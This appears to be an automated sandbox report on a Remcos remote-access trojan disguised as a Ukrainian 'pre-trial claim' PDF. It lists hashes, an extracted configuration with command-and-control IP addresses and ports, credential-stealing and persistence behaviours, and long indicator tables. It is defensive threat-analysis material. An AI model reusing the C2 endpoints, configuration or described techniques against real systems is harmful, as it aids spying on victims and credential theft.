remcos | ec059d014e9208dceded5ce614ea4f95e26c1ed45ad81ce5de348e5df7647197

Analysis

max time kernel
600s
max time network
601s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
13-11-2024 10:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Передсудова претензія.pdf.exe
Size

1.0MB
MD5

fc877cda1618318751789044fb01a6bd
SHA1

15f90c8f5c543964a33d62d6e68f62a6d2712262
SHA256

ec059d014e9208dceded5ce614ea4f95e26c1ed45ad81ce5de348e5df7647197
SHA512

b96c3148e98b089ce25b1a2987df24f87bd0e7cd312ee9dc270ce3d6dacc48276213f313c162dc721440410c2ca1a265fd54eea546095a2cafbe2a34cac912d4
SSDEEP

24576:ruPaNmFtZU7DPNqRLhVVOgHD/raiDhFDsoUCcjL:NQzUvPNakGbD/soUdjL

Score

10^/10

remcos hsts discovery rat spyware stealer

Malware Config

Extracted

Family

remcos

Botnet

hsts

62.60.244.124:25

62.60.244.124:8082

62.60.244.124:567

62.60.244.124:90

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-9G0ESP
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

Crossword.pifMusicians.pif

description	pid	Process	procid_target
PID 4376 created 3668	4376	Crossword.pif	57
PID 4696 created 3668	4696	Musicians.pif	57

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Передсудова претензія.pdf.exeCrossword.pifRevenueDevices.exeEither.pifPlansIntend.exeMusicians.pif

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	Передсудова претензія.pdf.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	Crossword.pif
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	RevenueDevices.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	Either.pif
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	PlansIntend.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	Musicians.pif

Drops startup file 4 IoCs

Processes:

cmd.execmd.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MusesLearn.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MusesLearn.url	cmd.exe

Executes dropped EXE 8 IoCs

Processes:

Crossword.pifazvw.exeRevenueDevices.exeEither.pifazvw.exe7za.exePlansIntend.exeMusicians.pif

pid	Process
4376	Crossword.pif
4644	azvw.exe
1760	RevenueDevices.exe
2440	Either.pif
660	azvw.exe
4744	7za.exe
4740	PlansIntend.exe
4696	Musicians.pif

Loads dropped DLL 1 IoCs

Processes:

Either.pif

pid	Process
2440	Either.pif

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Enumerates processes with tasklist 1 TTPs 6 IoCs

discovery

Process Discovery

T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid	Process
1068	tasklist.exe
2848	tasklist.exe
4544	tasklist.exe
4168	tasklist.exe
4668	tasklist.exe
4648	tasklist.exe

Drops file in Windows directory 32 IoCs

Processes:

UserOOBEBroker.exePlansIntend.exeRevenueDevices.exeUserOOBEBroker.exeTiWorker.exeUserOOBEBroker.exeUserOOBEBroker.exeПередсудова претензія.pdf.exe

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\EzOrganization	PlansIntend.exe
File opened for modification	C:\Windows\NotifiedAaron	RevenueDevices.exe
File opened for modification	C:\Windows\BrushSub	RevenueDevices.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\FellowshipMagazine	PlansIntend.exe
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\McLol	RevenueDevices.exe
File opened for modification	C:\Windows\StaticHampshire	PlansIntend.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\FixesPersonally	PlansIntend.exe
File opened for modification	C:\Windows\RespectAdobe	PlansIntend.exe
File opened for modification	C:\Windows\AffordableVariation	PlansIntend.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\CbsTemp	TiWorker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\ThrownTips	PlansIntend.exe
File opened for modification	C:\Windows\TmpMoon	RevenueDevices.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\SoilOasis	Передсудова претензія.pdf.exe
File opened for modification	C:\Windows\RebatesPalm	Передсудова претензія.pdf.exe
File opened for modification	C:\Windows\DouglasWind	Передсудова претензія.pdf.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.execmd.execmd.execmd.execmd.execmd.exereg.execmd.execmd.exereg.execmd.exereg.exereg.exechoice.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exereg.execmd.execmd.execmd.execmd.exereg.execmd.exereg.execmd.exeschtasks.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exereg.execmd.exeschtasks.execmd.exeschtasks.exeschtasks.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exereg.exereg.exereg.execmd.execmd.execmd.exefindstr.execmd.execmd.exereg.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

cmd.exeRobocopy.exe

pid	Process
3400	cmd.exe
548	Robocopy.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

Processes:

systeminfo.exe

pid	Process
4696	systeminfo.exe

Modifies registry class 1 IoCs

Processes:

Musicians.pif

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000_Classes\Local Settings	Musicians.pif

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Crossword.pif

pid	Process
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Crossword.pif

pid	Process
4376	Crossword.pif

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

tasklist.exetasklist.exeWMIC.exeTiWorker.exeCrossword.piftasklist.exetasklist.exeRobocopy.exe7za.exe

description	pid	Process
Token: SeDebugPrivilege	2848	tasklist.exe
Token: SeDebugPrivilege	4544	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2172	WMIC.exe
Token: SeSecurityPrivilege	2172	WMIC.exe
Token: SeTakeOwnershipPrivilege	2172	WMIC.exe
Token: SeLoadDriverPrivilege	2172	WMIC.exe
Token: SeSystemProfilePrivilege	2172	WMIC.exe
Token: SeSystemtimePrivilege	2172	WMIC.exe
Token: SeProfSingleProcessPrivilege	2172	WMIC.exe
Token: SeIncBasePriorityPrivilege	2172	WMIC.exe
Token: SeCreatePagefilePrivilege	2172	WMIC.exe
Token: SeBackupPrivilege	2172	WMIC.exe
Token: SeRestorePrivilege	2172	WMIC.exe
Token: SeShutdownPrivilege	2172	WMIC.exe
Token: SeDebugPrivilege	2172	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2172	WMIC.exe
Token: SeRemoteShutdownPrivilege	2172	WMIC.exe
Token: SeUndockPrivilege	2172	WMIC.exe
Token: SeManageVolumePrivilege	2172	WMIC.exe
Token: 33	2172	WMIC.exe
Token: 34	2172	WMIC.exe
Token: 35	2172	WMIC.exe
Token: 36	2172	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2172	WMIC.exe
Token: SeSecurityPrivilege	2172	WMIC.exe
Token: SeTakeOwnershipPrivilege	2172	WMIC.exe
Token: SeLoadDriverPrivilege	2172	WMIC.exe
Token: SeSystemProfilePrivilege	2172	WMIC.exe
Token: SeSystemtimePrivilege	2172	WMIC.exe
Token: SeProfSingleProcessPrivilege	2172	WMIC.exe
Token: SeIncBasePriorityPrivilege	2172	WMIC.exe
Token: SeCreatePagefilePrivilege	2172	WMIC.exe
Token: SeBackupPrivilege	2172	WMIC.exe
Token: SeRestorePrivilege	2172	WMIC.exe
Token: SeShutdownPrivilege	2172	WMIC.exe
Token: SeDebugPrivilege	2172	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2172	WMIC.exe
Token: SeRemoteShutdownPrivilege	2172	WMIC.exe
Token: SeUndockPrivilege	2172	WMIC.exe
Token: SeManageVolumePrivilege	2172	WMIC.exe
Token: 33	2172	WMIC.exe
Token: 34	2172	WMIC.exe
Token: 35	2172	WMIC.exe
Token: 36	2172	WMIC.exe
Token: SeSecurityPrivilege	3140	TiWorker.exe
Token: SeRestorePrivilege	3140	TiWorker.exe
Token: SeBackupPrivilege	3140	TiWorker.exe
Token: 33	4376	Crossword.pif
Token: SeIncBasePriorityPrivilege	4376	Crossword.pif
Token: SeDebugPrivilege	4168	tasklist.exe
Token: SeDebugPrivilege	4668	tasklist.exe
Token: 33	4376	Crossword.pif
Token: SeIncBasePriorityPrivilege	4376	Crossword.pif
Token: 33	4376	Crossword.pif
Token: SeIncBasePriorityPrivilege	4376	Crossword.pif
Token: 33	4376	Crossword.pif
Token: SeIncBasePriorityPrivilege	4376	Crossword.pif
Token: SeBackupPrivilege	548	Robocopy.exe
Token: SeRestorePrivilege	548	Robocopy.exe
Token: SeSecurityPrivilege	548	Robocopy.exe
Token: SeTakeOwnershipPrivilege	548	Robocopy.exe
Token: SeRestorePrivilege	4744	7za.exe
Token: 35	4744	7za.exe
Token: SeSecurityPrivilege	4744	7za.exe

Suspicious use of FindShellTrayWindow 49 IoCs

Processes:

Crossword.pifEither.piftaskmgr.exeMusicians.pif

pid	Process
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
2440	Either.pif
2440	Either.pif
2440	Either.pif
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4696	Musicians.pif
4696	Musicians.pif
4696	Musicians.pif

Suspicious use of SendNotifyMessage 49 IoCs

Processes:

Crossword.pifEither.piftaskmgr.exeMusicians.pif

pid	Process
4376	Crossword.pif
4376	Crossword.pif
4376	Crossword.pif
2440	Either.pif
2440	Either.pif
2440	Either.pif
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4680	taskmgr.exe
4696	Musicians.pif
4696	Musicians.pif
4696	Musicians.pif

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

Either.pifMusicians.pif

pid	Process
2440	Either.pif
4696	Musicians.pif

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Передсудова претензія.pdf.execmd.exeCrossword.pifcmd.execmd.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 4168 wrote to memory of 4104	4168	Передсудова претензія.pdf.exe	83
PID 4168 wrote to memory of 4104	4168	Передсудова претензія.pdf.exe	83
PID 4168 wrote to memory of 4104	4168	Передсудова претензія.pdf.exe	83
PID 4104 wrote to memory of 2848	4104	cmd.exe	86
PID 4104 wrote to memory of 2848	4104	cmd.exe	86
PID 4104 wrote to memory of 2848	4104	cmd.exe	86
PID 4104 wrote to memory of 4368	4104	cmd.exe	87
PID 4104 wrote to memory of 4368	4104	cmd.exe	87
PID 4104 wrote to memory of 4368	4104	cmd.exe	87
PID 4104 wrote to memory of 4544	4104	cmd.exe	91
PID 4104 wrote to memory of 4544	4104	cmd.exe	91
PID 4104 wrote to memory of 4544	4104	cmd.exe	91
PID 4104 wrote to memory of 1488	4104	cmd.exe	92
PID 4104 wrote to memory of 1488	4104	cmd.exe	92
PID 4104 wrote to memory of 1488	4104	cmd.exe	92
PID 4104 wrote to memory of 5056	4104	cmd.exe	93
PID 4104 wrote to memory of 5056	4104	cmd.exe	93
PID 4104 wrote to memory of 5056	4104	cmd.exe	93
PID 4104 wrote to memory of 3128	4104	cmd.exe	94
PID 4104 wrote to memory of 3128	4104	cmd.exe	94
PID 4104 wrote to memory of 3128	4104	cmd.exe	94
PID 4104 wrote to memory of 3204	4104	cmd.exe	95
PID 4104 wrote to memory of 3204	4104	cmd.exe	95
PID 4104 wrote to memory of 3204	4104	cmd.exe	95
PID 4104 wrote to memory of 4376	4104	cmd.exe	96
PID 4104 wrote to memory of 4376	4104	cmd.exe	96
PID 4104 wrote to memory of 4376	4104	cmd.exe	96
PID 4104 wrote to memory of 3744	4104	cmd.exe	97
PID 4104 wrote to memory of 3744	4104	cmd.exe	97
PID 4104 wrote to memory of 3744	4104	cmd.exe	97
PID 4376 wrote to memory of 472	4376	Crossword.pif	98
PID 4376 wrote to memory of 472	4376	Crossword.pif	98
PID 4376 wrote to memory of 472	4376	Crossword.pif	98
PID 4376 wrote to memory of 2876	4376	Crossword.pif	109
PID 4376 wrote to memory of 2876	4376	Crossword.pif	109
PID 4376 wrote to memory of 2876	4376	Crossword.pif	109
PID 2876 wrote to memory of 2172	2876	cmd.exe	111
PID 2876 wrote to memory of 2172	2876	cmd.exe	111
PID 2876 wrote to memory of 2172	2876	cmd.exe	111
PID 4376 wrote to memory of 2548	4376	Crossword.pif	112
PID 4376 wrote to memory of 2548	4376	Crossword.pif	112
PID 4376 wrote to memory of 2548	4376	Crossword.pif	112
PID 4376 wrote to memory of 4600	4376	Crossword.pif	114
PID 4376 wrote to memory of 4600	4376	Crossword.pif	114
PID 4376 wrote to memory of 4600	4376	Crossword.pif	114
PID 4600 wrote to memory of 2544	4600	cmd.exe	116
PID 4600 wrote to memory of 2544	4600	cmd.exe	116
PID 4600 wrote to memory of 2544	4600	cmd.exe	116
PID 4376 wrote to memory of 3272	4376	Crossword.pif	118
PID 4376 wrote to memory of 3272	4376	Crossword.pif	118
PID 4376 wrote to memory of 3272	4376	Crossword.pif	118
PID 3272 wrote to memory of 4908	3272	cmd.exe	120
PID 3272 wrote to memory of 4908	3272	cmd.exe	120
PID 3272 wrote to memory of 4908	3272	cmd.exe	120
PID 4376 wrote to memory of 3232	4376	Crossword.pif	121
PID 4376 wrote to memory of 3232	4376	Crossword.pif	121
PID 4376 wrote to memory of 3232	4376	Crossword.pif	121
PID 3232 wrote to memory of 3936	3232	cmd.exe	123
PID 3232 wrote to memory of 3936	3232	cmd.exe	123
PID 3232 wrote to memory of 3936	3232	cmd.exe	123
PID 4376 wrote to memory of 3872	4376	Crossword.pif	124
PID 4376 wrote to memory of 3872	4376	Crossword.pif	124
PID 4376 wrote to memory of 3872	4376	Crossword.pif	124
PID 3872 wrote to memory of 3284	3872	cmd.exe	126

cURL User-Agent 64 IoCs

Uses User-Agent string associated with cURL utility.

Processes:

description	flow	ioc
HTTP User-Agent header	140	curl/8.7.1
HTTP User-Agent header	184	curl/8.7.1
HTTP User-Agent header	247	curl/8.7.1
HTTP User-Agent header	252	curl/8.7.1
HTTP User-Agent header	255	curl/8.7.1
HTTP User-Agent header	42	curl/8.7.1
HTTP User-Agent header	100	curl/8.7.1
HTTP User-Agent header	174	curl/8.7.1
HTTP User-Agent header	193	curl/8.7.1
HTTP User-Agent header	197	curl/8.7.1
HTTP User-Agent header	275	curl/8.7.1
HTTP User-Agent header	35	curl/8.7.1
HTTP User-Agent header	60	curl/8.7.1
HTTP User-Agent header	82	curl/8.7.1
HTTP User-Agent header	97	curl/8.7.1
HTTP User-Agent header	179	curl/8.7.1
HTTP User-Agent header	210	curl/8.7.1
HTTP User-Agent header	218	curl/8.7.1
HTTP User-Agent header	259	curl/8.7.1
HTTP User-Agent header	58	curl/8.7.1
HTTP User-Agent header	76	curl/8.7.1
HTTP User-Agent header	241	curl/8.7.1
HTTP User-Agent header	265	curl/8.7.1
HTTP User-Agent header	123	curl/8.7.1
HTTP User-Agent header	191	curl/8.7.1
HTTP User-Agent header	91	curl/8.7.1
HTTP User-Agent header	117	curl/8.7.1
HTTP User-Agent header	180	curl/8.7.1
HTTP User-Agent header	215	curl/8.7.1
HTTP User-Agent header	260	curl/8.7.1
HTTP User-Agent header	38	curl/8.7.1
HTTP User-Agent header	84	curl/8.7.1
HTTP User-Agent header	81	curl/8.7.1
HTTP User-Agent header	88	curl/8.7.1
HTTP User-Agent header	102	curl/8.7.1
HTTP User-Agent header	119	curl/8.7.1
HTTP User-Agent header	122	curl/8.7.1
HTTP User-Agent header	147	curl/8.7.1
HTTP User-Agent header	55	curl/8.7.1
HTTP User-Agent header	68	curl/8.7.1
HTTP User-Agent header	206	curl/8.7.1
HTTP User-Agent header	69	curl/8.7.1
HTTP User-Agent header	227	curl/8.7.1
HTTP User-Agent header	264	curl/8.7.1
HTTP User-Agent header	269	curl/8.7.1
HTTP User-Agent header	36	curl/8.7.1
HTTP User-Agent header	43	curl/8.7.1
